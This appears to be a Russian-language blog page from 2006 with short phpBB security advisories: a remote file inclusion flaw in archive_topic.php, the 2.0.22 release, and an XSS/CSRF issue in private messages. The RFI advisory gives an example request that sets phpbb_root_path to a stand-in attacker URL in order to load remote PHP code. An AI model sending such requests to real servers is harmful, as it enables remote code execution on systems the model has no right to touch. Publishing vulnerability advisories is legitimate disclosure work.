Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" сценарием archive_topic.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Веб сервера.
Пример: /includes/archive/archive_topic.php?phpbb_root_path=http://evil_scripts?
Источник: xakep.ru
вторник, декабря 26, 2006
понедельник, декабря 25, 2006
Вышел phpBB 2.0.22
В новый релиз включено много полезных исправлений по части безопасности, например так называемая плавающая ошибка XSS в системе личных сообщений. Со всеми изменениями вы можете ознакомиться здесь (на русском). Там же есть ссылка на дистрибутив.
суббота, декабря 09, 2006
Уязвимости phpBB: Межсайтовый скриптинг в phpBB
Обнаружена уязвимость в phpBB последней версии 2.0.21. Удаленный пользователь может произвести XSS нападение и CSRF атаку. Как видно из сообщения об уязвимости, XSS нападение возможно через сервис личных сообщений (private messages).
Опасность: Низкая.
Способов устранения уязвимости на данный момент не существует.
Опасность: Низкая.
Способов устранения уязвимости на данный момент не существует.
Подписаться на:
Сообщения (Atom)